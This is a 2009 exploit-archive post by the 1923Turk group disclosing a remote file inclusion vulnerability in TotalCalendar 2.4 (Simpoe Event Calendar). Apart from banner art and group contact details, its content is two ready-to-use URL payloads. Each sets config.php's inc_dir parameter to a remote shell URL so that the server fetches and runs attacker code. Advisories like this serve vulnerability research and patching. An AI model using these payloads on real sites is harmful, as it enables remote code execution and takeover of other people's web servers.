[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TotalCalendar 2.4 (inc_dir) Remote File Inclusion Vulnerability
# Published : 2009-04-20
# Author : DarKdewiL
# Previous Title : FunGamez rc1 (AB/LFI) Multiple Remote Vulnerabilities
# Next Title : e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit
//***********************************************************************//
//**********************1 9 2 3 T U R K - G R U P************************//
//_______________________________________________________________________//
//-----------------------------------------------------------------------//
<--[+]-->
[~] Home Page : "http://www.simpoe.com/"
[~] Download : "http://www.simpoe.com/calendre/TotalCalendar_2.4.zip"
[~] ScriptName: "Simpoe Event Calendar"
[~] Date: "20/04/2009"
[~] Time: "18:38"
<--[!]-->
[+] Bugs : Remote File Include
[+] D0rk : Not Dork :(
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[+] Contact : darkdewil@1923turk.biz
[!] Note : You're too important for anyone <1923Turk>
<--[-]-->
(+)Vuln:
http://www.sitename.com/calendre/config.php?inc_dir=ShellURL
OR
http://www.sitename.com/config.php?inc_dir=ShellURL
//***********************************************************************//
//***********************************************************************//
//***********************************************************************//
# www.Syue.com [2009-04-20]